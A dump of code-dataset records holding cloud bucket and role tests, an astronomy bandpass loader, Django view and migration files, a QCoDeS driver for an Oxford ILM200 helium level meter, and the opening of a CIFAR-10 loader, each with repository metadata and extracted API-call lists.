url = await provider_option.provider.sign_url_for_blob(bucket, "foo/bar")
async with ClientSession() as session:
async with session.get(url) as resp:
data = await resp.read()
assert data == b"test data"
async def test_public_access_to_bucket(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto has bad support of this operation")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("blob1", b"blob data 1")
await admin_client.put_object("blob2", b"blob data 2")
await provider_option.provider.set_public_access(bucket.name, True)
async with ClientSession() as session:
url = provider_option.get_public_url(bucket.name, "blob1")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 1"
url = provider_option.get_public_url(bucket.name, "blob2")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 2"
async def test_bucket_make_public_for_imported_bucket(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto fails with 500")
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("blob1", b"blob data 1")
await admin_client.put_object("blob2", b"blob data 2")
async with UserBucketOperations.get_for_imported_bucket(
ImportedBucket(
id="not-important",
created_at=datetime.now(timezone.utc),
owner="user",
name="not-important",
org_name=None,
public=False,
provider_bucket=bucket,
credentials=provider_option.credentials_for_imported,
)
) as operations:
await operations.set_public_access(bucket.name, True)
async with ClientSession() as session:
url = provider_option.get_public_url(bucket.name, "blob1")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 1"
url = provider_option.get_public_url(bucket.name, "blob2")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 2"
@pytest.fixture()
async def sample_role_permissions(
self, provider_option: ProviderTestOption
) -> list[BucketPermission]:
bucket_name = _make_bucket_name()
await provider_option.provider.create_bucket(bucket_name)
return [
BucketPermission(
bucket_name=bucket_name,
write=True,
)
]
async def test_role_create(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
role = await provider_option.provider.create_role(name, sample_role_permissions)
assert name in role.name
assert await provider_option.role_exists(role.name)
async def test_role_create_multiple(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name1, name2 = _make_role_name(), _make_role_name()
role1 = await provider_option.provider.create_role(
name1, sample_role_permissions
)
role2 = await provider_option.provider.create_role(
name2, sample_role_permissions
)
assert await provider_option.role_exists(role1.name)
assert await provider_option.role_exists(role2.name)
async def test_role_duplicate(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
await provider_option.provider.create_role(name, sample_role_permissions)
with pytest.raises(RoleExistsError):
await provider_option.provider.create_role(name, sample_role_permissions)
async def test_role_delete(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
role = await provider_option.provider.create_role(name, sample_role_permissions)
await provider_option.provider.delete_role(role)
assert not await provider_option.role_exists(role.name)
async def test_role_grant_bucket_write_access(
self,
provider_option: ProviderTestOption,
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(bucket, role.credentials) as user_client:
await _test_write_access(user_client)
async def test_role_grant_bucket_read_only_access(
self,
provider_option: ProviderTestOption,
) -> None:
        return  # NOTE: test disabled by this unconditional early return
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=False,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
async def test_role_grant_access_multiple_buckets(
self,
provider_option: ProviderTestOption,
) -> None:
if provider_option.type == "azure":
pytest.skip("Azure provider do not support multiple buckets roles")
bucket1 = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket1.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(
bucket1, role.credentials
) as user_client:
await _test_write_access(user_client)
bucket2 = await provider_option.provider.create_bucket(_make_bucket_name())
await provider_option.provider.set_role_permissions(
role,
[
BucketPermission(
bucket_name=bucket1.name,
write=True,
),
BucketPermission(
bucket_name=bucket2.name,
write=True,
),
],
)
async with provider_option.make_client(
bucket1, role.credentials
) as user_client:
await _test_write_access(user_client)
async with provider_option.make_client(
bucket2, role.credentials
) as user_client:
await _test_write_access(user_client)
async def test_role_downgrade_access(
self,
provider_option: ProviderTestOption,
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(bucket, role.credentials) as user_client:
await _test_write_access(user_client)
await provider_option.provider.set_role_permissions(
role,
[
BucketPermission(
bucket_name=bucket.name,
write=False,
),
],
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
await provider_option.provider.set_role_permissions(
role,
[],
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_no_access(admin, user_client)
| [((52, 1, 52, 12), 'dataclasses.dataclass', 'dataclass', ({}, {}), '()', False, 'from dataclasses import dataclass\n'), ((87, 10, 87, 30), 'secrets.token_hex', 'secrets.token_hex', ({(87, 28, 87, 29): '8'}, {}), '(8)', False, 'import secrets\n'), ((265, 5, 265, 21), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((27, 32, 27, 52), 'secrets.token_hex', 'secrets.token_hex', ({(27, 50, 27, 51): '(5)'}, {}), '(5)', False, 'import secrets\n'), ((31, 30, 31, 50), 'secrets.token_hex', 'secrets.token_hex', ({(31, 48, 31, 49): '(5)'}, {}), '(5)', False, 'import secrets\n'), ((89, 9, 89, 33), 'pytest.raises', 'pytest.raises', ({(89, 23, 89, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((94, 9, 94, 33), 'pytest.raises', 'pytest.raises', ({(94, 23, 94, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((97, 9, 97, 33), 'pytest.raises', 'pytest.raises', ({(97, 23, 97, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((100, 9, 100, 33), 'pytest.raises', 'pytest.raises', ({(100, 23, 100, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((111, 9, 111, 33), 'pytest.raises', 'pytest.raises', ({(111, 23, 111, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((120, 9, 120, 33), 'pytest.raises', 'pytest.raises', ({(120, 23, 120, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((156, 13, 156, 45), 'pytest.raises', 'pytest.raises', ({(156, 27, 156, 44): 'BucketExistsError'}, {}), '(BucketExistsError)', False, 'import pytest\n'), ((168, 13, 168, 48), 'pytest.raises', 'pytest.raises', ({(168, 27, 168, 47): 'BucketNotExistsError'}, {}), '(BucketNotExistsError)', False, 'import pytest\n'), ((186, 12, 186, 76), 'pytest.skip', 'pytest.skip', ({(186, 24, 186, 75): '"""Moto do not support embedding policies into token"""'}, {}), "('Moto do not support embedding policies into token')", False, 'import pytest\n'), ((200, 12, 200, 61), 'pytest.skip', 'pytest.skip', ({(200, 24, 200, 60): '"""Moto fails for signed url with 500"""'}, {}), "('Moto fails for signed url with 500')", False, 'import pytest\n'), ((205, 19, 205, 34), 'aiohttp.ClientSession', 'ClientSession', ({}, {}), '()', False, 'from aiohttp import ClientSession\n'), ((214, 12, 214, 65), 'pytest.skip', 'pytest.skip', ({(214, 24, 214, 64): '"""Moto has bad support of this operation"""'}, {}), "('Moto has bad support of this operation')", False, 'import pytest\n'), ((220, 19, 220, 34), 'aiohttp.ClientSession', 'ClientSession', ({}, {}), '()', False, 'from aiohttp import ClientSession\n'), ((234, 12, 234, 46), 'pytest.skip', 'pytest.skip', ({(234, 24, 234, 45): '"""Moto fails with 500"""'}, {}), "('Moto fails with 500')", False, 'import pytest\n'), ((255, 19, 255, 34), 'aiohttp.ClientSession', 'ClientSession', ({}, {}), '()', False, 'from aiohttp import ClientSession\n'), ((272, 12, 275, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((310, 13, 310, 43), 'pytest.raises', 'pytest.raises', ({(310, 27, 310, 42): 'RoleExistsError'}, {}), '(RoleExistsError)', False, 'import pytest\n'), ((329, 12, 332, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, 
UserBucketOperations\n'), ((347, 12, 350, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((365, 12, 365, 79), 'pytest.skip', 'pytest.skip', ({(365, 24, 365, 78): '"""Azure provider do not support multiple buckets roles"""'}, {}), "('Azure provider do not support multiple buckets roles')", False, 'import pytest\n'), ((369, 12, 372, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((411, 12, 414, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((386, 16, 389, 17), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((390, 16, 393, 17), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((424, 16, 427, 17), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((245, 27, 245, 53), 'datetime.datetime.now', 'datetime.now', ({(245, 40, 245, 52): 'timezone.utc'}, {}), '(timezone.utc)', False, 'from datetime import datetime, timezone\n')] |
jianyangli/sbpy | sbpy/photometry/bandpass.py | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
sbpy bandpass Module
"""
__all__ = [
'bandpass'
]
import os
from astropy.utils.data import get_pkg_data_filename
def bandpass(name):
"""Retrieve bandpass transmission spectrum from sbpy.
Parameters
----------
name : string
Name of the bandpass, case insensitive. See notes for
available filters.
Returns
-------
bp : `~synphot.SpectralElement`
Notes
-----
Available filters:
+-------------+---------------------------+
| Name | Source |
+=============+===========================+
| 2MASS J | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS H | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS Ks | Cohen et al. 2003 |
+-------------+---------------------------+
| Cousins R | STScI CDBS, v4 |
+-------------+---------------------------+
| Cousins I | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson U | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson B | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson V | STScI CDBS, v4 |
+-------------+---------------------------+
| PS1 g | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 r | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 i | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 w | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 y | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 z | Tonry et al. 2012 |
+-------------+---------------------------+
| SDSS u | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS g | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS r | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS i | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS z | SDSS, dated 2001 |
+-------------+---------------------------+
| WFC3 F438W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WFC3 F606W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WISE W1 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W2 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W3 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W4 | Jarrett et al. 2011 |
+-------------+---------------------------+
References
----------
.. [CDBS] Space Telescope Science Institute. HST Calibration Reference
Data System. https://hst-crds.stsci.edu/ .
.. [COH03] Cohen, M. et al. 2003. Spectral Irradiance Calibration
in the Infrared. XIV. The Absolute Calibration of 2MASS. AJ
126, 1090.
.. [JAR11] Jarrett, T. H. et al. 2011. The Spitzer-WISE Survey of
the Ecliptic Poles. ApJ 735, 112.
.. [SDSS] Sloan Digital Sky Survey. Camera.
www.sdss.org/instruments/camera .
.. [TON12] Tonry, J. L. et al. 2012. The Pan-STARRS1 Photometric
System. ApJ 750, 99.
"""
try:
import synphot
except ImportError:
raise ImportError('synphot is required.')
name2file = {
'2mass j': '2mass-j-rsr.txt',
'2mass h': '2mass-h-rsr.txt',
'2mass ks': '2mass-ks-rsr.txt',
'cousins r': 'cousins_r_004_syn.fits',
'cousins i': 'cousins_i_004_syn.fits',
'johnson u': 'johnson_u_004_syn.fits',
'johnson b': 'johnson_b_004_syn.fits',
'johnson v': 'johnson_v_004_syn.fits',
'ps1 g': 'ps1-gp1.txt',
'ps1 r': 'ps1-rp1.txt',
'ps1 i': 'ps1-ip1.txt',
'ps1 w': 'ps1-wp1.txt',
'ps1 y': 'ps1-yp1.txt',
'ps1 z': 'ps1-zp1.txt',
'sdss u': 'sdss-u.fits',
'sdss g': 'sdss-g.fits',
'sdss r': 'sdss-r.fits',
'sdss i': 'sdss-i.fits',
'sdss z': 'sdss-z.fits',
'wfc3 f438w': 'wfc3_uvis_f438w_004_syn.fits',
'wfc3 f606w': 'wfc3_uvis_f606w_004_syn.fits',
'wise w1': 'WISE-RSR-W1.EE.txt',
'wise w2': 'WISE-RSR-W2.EE.txt',
'wise w3': 'WISE-RSR-W3.EE.txt',
'wise w4': 'WISE-RSR-W4.EE.txt',
}
fn = get_pkg_data_filename(os.path.join(
'..', 'photometry', 'data', name2file[name.lower()]))
bp = synphot.SpectralElement.from_file(fn)
return bp
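

# Hedged usage sketch (not part of the module); assumes synphot is installed
# and that the package re-exports this function from sbpy.photometry:
#
#   from sbpy.photometry import bandpass
#   bp = bandpass('2MASS J')
#   print(bp.avgwave())  # average wavelength of the band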
| [((144, 9, 144, 46), 'synphot.SpectralElement.from_file', 'synphot.SpectralElement.from_file', ({(144, 43, 144, 45): 'fn'}, {}), '(fn)', False, 'import synphot\n')] |
sinag/SWE574-Horuscope | appserver/search/views.py | 9725dd356cbfd19f0ce88d4a208c872be765bd88 | from django.http import HttpResponse
from django.shortcuts import render, redirect
from community.models import Community
# Create your views here.
def search_basic(request):
    communities = None
    if request.POST:
        community_query = request.POST.get('community_search', False)
        if community_query:
            communities = Community.objects.filter(city__icontains=community_query)
            print(communities)
    return render(request, 'search/search_basic.html', {'communities': communities})
| [((15, 11, 15, 84), 'django.shortcuts.render', 'render', ({(15, 18, 15, 25): 'request', (15, 27, 15, 53): '"""search/search_basic.html"""', (15, 55, 15, 83): "{'communities': communities}"}, {}), "(request, 'search/search_basic.html', {'communities': communities})", False, 'from django.shortcuts import render, redirect\n'), ((12, 22, 12, 79), 'community.models.Community.objects.filter', 'Community.objects.filter', (), '', False, 'from community.models import Community\n'), ((14, 15, 14, 88), 'django.shortcuts.render', 'render', ({(14, 22, 14, 29): 'request', (14, 31, 14, 57): '"""search/search_basic.html"""', (14, 59, 14, 87): "{'communities': communities}"}, {}), "(request, 'search/search_basic.html', {'communities': communities})", False, 'from django.shortcuts import render, redirect\n')] |
Sudani-Coder/teammanager | teams/migrations/0001_initial.py | 857082bc14d7a783d2327b4e982edba7c061f303 | # Generated by Django 3.1.2 on 2020-10-18 17:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='GameScore',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_team', models.CharField(max_length=200)),
('second_team', models.CharField(max_length=200)),
('first_team_score', models.IntegerField(default=0)),
('second_team_score', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Player',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('number', models.IntegerField()),
('age', models.IntegerField()),
('position_in_field', models.CharField(choices=[('1', 'حارس'), ('2', 'دفاع'), ('3', 'وسط'), ('4', 'هجوم')], max_length=200)),
],
),
migrations.CreateModel(
name='Team',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True)),
('details', models.TextField()),
],
),
]
| [((17, 23, 17, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((18, 31, 18, 63), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((19, 32, 19, 64), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((20, 37, 20, 67), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import migrations, models\n'), ((21, 38, 21, 68), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import migrations, models\n'), ((27, 23, 27, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((28, 25, 28, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((29, 27, 29, 48), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((30, 24, 30, 45), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((31, 38, 31, 154), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((37, 23, 37, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((38, 25, 38, 70), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((39, 28, 39, 46), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import migrations, models\n')] |
jenshnielsen/Qcodes_contrib_drivers | qcodes_contrib_drivers/drivers/Oxford/ILM200.py | dc878cdd99a62f4643a62163a3a6341f98cee440 | # OxfordInstruments_ILM200.py class, to perform the communication between the Wrapper and the device
# Copyright (c) 2017 QuTech (Delft)
# Code is available under the available under the `MIT open-source license <https://opensource.org/licenses/MIT>`__
#
# Pieter Eendebak <[email protected]>, 2017
# Takafumi Fujita <[email protected]>, 2016
# Guenevere Prawiroatmodjo <[email protected]>, 2009
# Pieter de Groot <[email protected]>, 2009
from time import sleep
import pyvisa as visa  # "import visa" is deprecated in recent pyvisa releases
import logging
from qcodes import VisaInstrument
class OxfordInstruments_ILM200(VisaInstrument):
"""
This is the qcodes driver for the Oxford Instruments ILM 200 Helium Level Meter.
    Usage:
    Initialize with:
        <name> = OxfordInstruments_ILM200('<name>', '<Instrument address>')
    where <Instrument address> is e.g. ASRL4::INSTR
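
    Example (assumes the meter sits on serial port ASRL4 with ISOBUS number 1):
        ilm = OxfordInstruments_ILM200('ilm', 'ASRL4::INSTR', number=1)
        print(ilm.level())  # helium level in percent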
Note: Since the ISOBUS allows for several instruments to be managed in parallel, the command
which is sent to the device starts with '@n', where n is the ISOBUS instrument number.
"""
def __init__(self, name, address, number=1, **kwargs):
"""
Initializes the Oxford Instruments ILM 200 Helium Level Meter.
Args:
name (str): name of the instrument
address (str): instrument address
number (int): ISOBUS instrument number (number=1 is specific to the ILM in F008)
Returns:
None
"""
logging.debug(__name__ + ' : Initializing instrument')
super().__init__(name, address, **kwargs)
self.visa_handle.set_visa_attribute(visa.constants.VI_ATTR_ASRL_STOP_BITS,
visa.constants.VI_ASRL_STOP_TWO)
self._address = address
self._number = number
self._values = {}
self.add_parameter('level',
label='level',
get_cmd=self._do_get_level,
unit='%')
self.add_parameter('status',
get_cmd=self._do_get_status)
self.add_parameter('rate',
get_cmd=self._do_get_rate,
set_cmd=self._do_set_rate)
# a dummy command to avoid the initial error
try:
self.get_idn()
sleep(70e-3) # wait for the device to be able to respond
self._read() # to flush the buffer
except Exception as ex:
logging.debug(ex)
def _execute(self, message):
"""
Write a command to the device and read answer. This function writes to
the buffer by adding the device number at the front, instead of 'ask'.
Args:
message (str) : write command for the device
Returns:
None
"""
logging.info(
__name__ + ' : Send the following command to the device: %s' % message)
self.visa_handle.write('@%s%s' % (self._number, message))
sleep(70e-3) # wait for the device to be able to respond
result = self._read()
if result.find('?') >= 0:
print("Error: Command %s not recognized" % message)
else:
return result
def _read(self):
"""
Reads the total bytes in the buffer and outputs as a string.
Args:
None
Returns:
message (str)
"""
# because protocol has no termination chars the read reads the number
# of bytes in the buffer
bytes_in_buffer = self.visa_handle.bytes_in_buffer
        # a workaround for a timeout error in the pyvisa read_raw() function
with(self.visa_handle.ignore_warning(visa.constants.VI_SUCCESS_MAX_CNT)):
mes = self.visa_handle.visalib.read(
self.visa_handle.session, bytes_in_buffer)
# cannot be done on same line for some reason
mes = str(mes[0].decode())
return mes
def get_idn(self):
"""
Overrides the function of Instrument since ILM does not support `*IDN?`
This string is supposed to be a
comma-separated list of vendor, model, serial, and firmware, but
semicolon and colon are also common separators so we accept them here
as well.
Returns:
A dict containing vendor, model, serial, and firmware.
"""
try:
idstr = '' # in case self.ask fails
idstr = self._get_version().split()
# form is supposed to be comma-separated, but we've seen
# other separators occasionally
idparts = [idstr[3] + ' ' + idstr[4], idstr[0], idstr[5],
idstr[1] + ' ' + idstr[2]]
# in case parts at the end are missing, fill in None
if len(idparts) < 4:
idparts += [None] * (4 - len(idparts))
except Exception as ex:
            logging.warning('Error getting or interpreting *IDN?: ' + repr(idstr))
logging.debug(ex)
idparts = [None, None, None, None]
return dict(zip(('vendor', 'model', 'serial', 'firmware'), idparts))
def get_all(self):
"""
Reads all implemented parameters from the instrument,
and updates the wrapper.
"""
logging.info(__name__ + ' : reading all settings from instrument')
self.level.get()
self.status.get()
self.rate.get()
def close(self):
"""
Safely close connection
"""
logging.info(__name__ + ' : Closing ILM200 connection')
self.local()
super().close()
# Functions: Monitor commands
def _get_version(self):
"""
Identify the device
Args:
None
Returns:
identification (str): should be 'ILM200 Version 1.08 (c) OXFORD 1994\r'
"""
logging.info(__name__ + ' : Identify the device')
return self._execute('V')
def _do_get_level(self):
"""
Get Helium level of channel 1.
Args:
None
Returns:
result (float) : Helium level
"""
logging.info(__name__ + ' : Read level of channel 1')
result = self._execute('R1')
return float(result.replace("R", "")) / 10
def _do_get_status(self):
"""
Get status of the device.
"""
logging.info(__name__ + ' : Get status of the device.')
result = self._execute('X')
usage = {
0: "Channel not in use",
1: "Channel used for Nitrogen level",
2: "Channel used for Helium Level (Normal pulsed operation)",
3: "Channel used for Helium Level (Continuous measurement)",
9: "Error on channel (Usually means probe unplugged)"
}
# current_flowing = {
        #     0 : "Current not flowing in Helium Probe Wire",
        #     1 : "Current flowing in Helium Probe Wire"
# }
# auto_fill_status = {
# 00 : "End Fill (Level > FULL)",
# 01 : "Not Filling (Level < FULL, Level > FILL)",
# 10 : "Filling (Level < FULL, Level > FILL)",
# 11 : "Start Filling (Level < FILL)"
# }
return usage.get(int(result[1]), "Unknown")
def _do_get_rate(self):
"""
Get helium meter channel 1 probe rate
Input:
None
Output:
rate(int) :
0 : "SLOW"
1 : "FAST"
"""
rate = {
1: "1 : Helium Probe in FAST rate",
0: "0 : Helium Probe in SLOW rate"
}
result = self._execute('X')
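        # 'X' returns the instrument status string; result[5:7] is the
        # channel-1 status field, which is rendered as an 8-bit binary
        # string whose bit at index 6 encodes SLOW (0) vs FAST (1).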
return rate.get(int(format(int(result[5:7]), '08b')[6]), "Unknown")
def remote(self):
"""
Set control to remote & locked
"""
logging.info(__name__ + ' : Set control to remote & locked')
self.set_remote_status(1)
def local(self):
"""
Set control to local & locked
"""
logging.info(__name__ + ' : Set control to local & locked')
self.set_remote_status(0)
def set_remote_status(self, mode):
"""
Set remote control status.
Args:
mode(int) :
0 : "Local and locked",
1 : "Remote and locked",
2 : "Local and unlocked",
3 : "Remote and unlocked",
Returns:
None
"""
status = {
0: "Local and locked",
1: "Remote and locked",
2: "Local and unlocked",
3: "Remote and unlocked",
}
logging.info(__name__ + ' : Setting remote control status to %s' %
status.get(mode, "Unknown"))
self._execute('C%s' % mode)
# Functions: Control commands (only recognised when in REMOTE control)
def set_to_slow(self):
"""
Set helium meter channel 1 to slow mode.
"""
self.set_remote_status(1)
logging.info(__name__ + ' : Setting Helium Probe in SLOW rate')
self._execute('S1')
self.set_remote_status(3)
def set_to_fast(self):
"""
Set helium meter channel 1 to fast mode.
"""
self.set_remote_status(1)
logging.info(__name__ + ' : Setting Helium Probe in FAST rate')
self._execute('T1')
self.set_remote_status(3)
def _do_set_rate(self, rate):
"""
Set helium meter channel 1 probe rate
Args:
rate(int) :
0 : "SLOW"
1 : "FAST"
"""
self.set_remote_status(1)
if rate == 0:
self.set_to_slow()
elif rate == 1:
self.set_to_fast()
self.set_remote_status(3)
logging.info(self._do_get_rate())
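# A minimal usage sketch (illustrative; assumes an ILM200 reachable at the
# VISA address below with ISOBUS number 1, as in the class docstring):
#
#     ilm = OxfordInstruments_ILM200('ilm', 'ASRL4::INSTR', number=1)
#     print(ilm.level.get())    # helium level in %
#     print(ilm.status.get())
#     ilm.close()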
| [((43, 8, 43, 62), 'logging.debug', 'logging.debug', ({(43, 22, 43, 61): "(__name__ + ' : Initializing instrument')"}, {}), "(__name__ + ' : Initializing instrument')", False, 'import logging\n'), ((81, 8, 82, 83), 'logging.info', 'logging.info', ({(82, 12, 82, 82): "(__name__ + ' : Send the following command to the device: %s' % message)"}, {}), "(__name__ + ' : Send the following command to the device: %s' %\n message)", False, 'import logging\n'), ((84, 8, 84, 20), 'time.sleep', 'sleep', ({(84, 14, 84, 19): '(0.07)'}, {}), '(0.07)', False, 'from time import sleep\n'), ((146, 8, 146, 74), 'logging.info', 'logging.info', ({(146, 21, 146, 73): "(__name__ + ' : reading all settings from instrument')"}, {}), "(__name__ + ' : reading all settings from instrument')", False, 'import logging\n'), ((155, 8, 155, 63), 'logging.info', 'logging.info', ({(155, 21, 155, 62): "(__name__ + ' : Closing ILM200 connection')"}, {}), "(__name__ + ' : Closing ILM200 connection')", False, 'import logging\n'), ((170, 8, 170, 57), 'logging.info', 'logging.info', ({(170, 21, 170, 56): "(__name__ + ' : Identify the device')"}, {}), "(__name__ + ' : Identify the device')", False, 'import logging\n'), ((183, 8, 183, 61), 'logging.info', 'logging.info', ({(183, 21, 183, 60): "(__name__ + ' : Read level of channel 1')"}, {}), "(__name__ + ' : Read level of channel 1')", False, 'import logging\n'), ((191, 8, 191, 63), 'logging.info', 'logging.info', ({(191, 21, 191, 62): "(__name__ + ' : Get status of the device.')"}, {}), "(__name__ + ' : Get status of the device.')", False, 'import logging\n'), ((235, 8, 235, 68), 'logging.info', 'logging.info', ({(235, 21, 235, 67): "(__name__ + ' : Set control to remote & locked')"}, {}), "(__name__ + ' : Set control to remote & locked')", False, 'import logging\n'), ((242, 8, 242, 67), 'logging.info', 'logging.info', ({(242, 21, 242, 66): "(__name__ + ' : Set control to local & locked')"}, {}), "(__name__ + ' : Set control to local & locked')", False, 'import logging\n'), ((275, 8, 275, 71), 'logging.info', 'logging.info', ({(275, 21, 275, 70): "(__name__ + ' : Setting Helium Probe in SLOW rate')"}, {}), "(__name__ + ' : Setting Helium Probe in SLOW rate')", False, 'import logging\n'), ((284, 8, 284, 71), 'logging.info', 'logging.info', ({(284, 21, 284, 70): "(__name__ + ' : Setting Helium Probe in FAST rate')"}, {}), "(__name__ + ' : Setting Helium Probe in FAST rate')", False, 'import logging\n'), ((65, 12, 65, 24), 'time.sleep', 'sleep', ({(65, 18, 65, 23): '(0.07)'}, {}), '(0.07)', False, 'from time import sleep\n'), ((68, 12, 68, 29), 'logging.debug', 'logging.debug', ({(68, 26, 68, 28): 'ex'}, {}), '(ex)', False, 'import logging\n'), ((136, 12, 136, 29), 'logging.debug', 'logging.debug', ({(136, 26, 136, 28): 'ex'}, {}), '(ex)', False, 'import logging\n')] |
xgxofdream/CNN-Using-Local-CIFAR-10-dataset | load_cifar_10.py | 8076056da58a5b564ded50f4cdb059585deb900d | import numpy as np
import matplotlib.pyplot as plt
import pickle
"""
The CIFAR-10 dataset consists of 60000 32x32 colour images in 10 classes, with 6000 images per class. There are 50000
training images and 10000 test images.
The dataset is divided into five training batches and one test batch, each with 10000 images. The test batch contains
exactly 1000 randomly-selected images from each class. The training batches contain the remaining images in random
order, but some training batches may contain more images from one class than another. Between them, the training
batches contain exactly 5000 images from each class.
"""
def unpickle(file):
"""load the cifar-10 data"""
with open(file, 'rb') as fo:
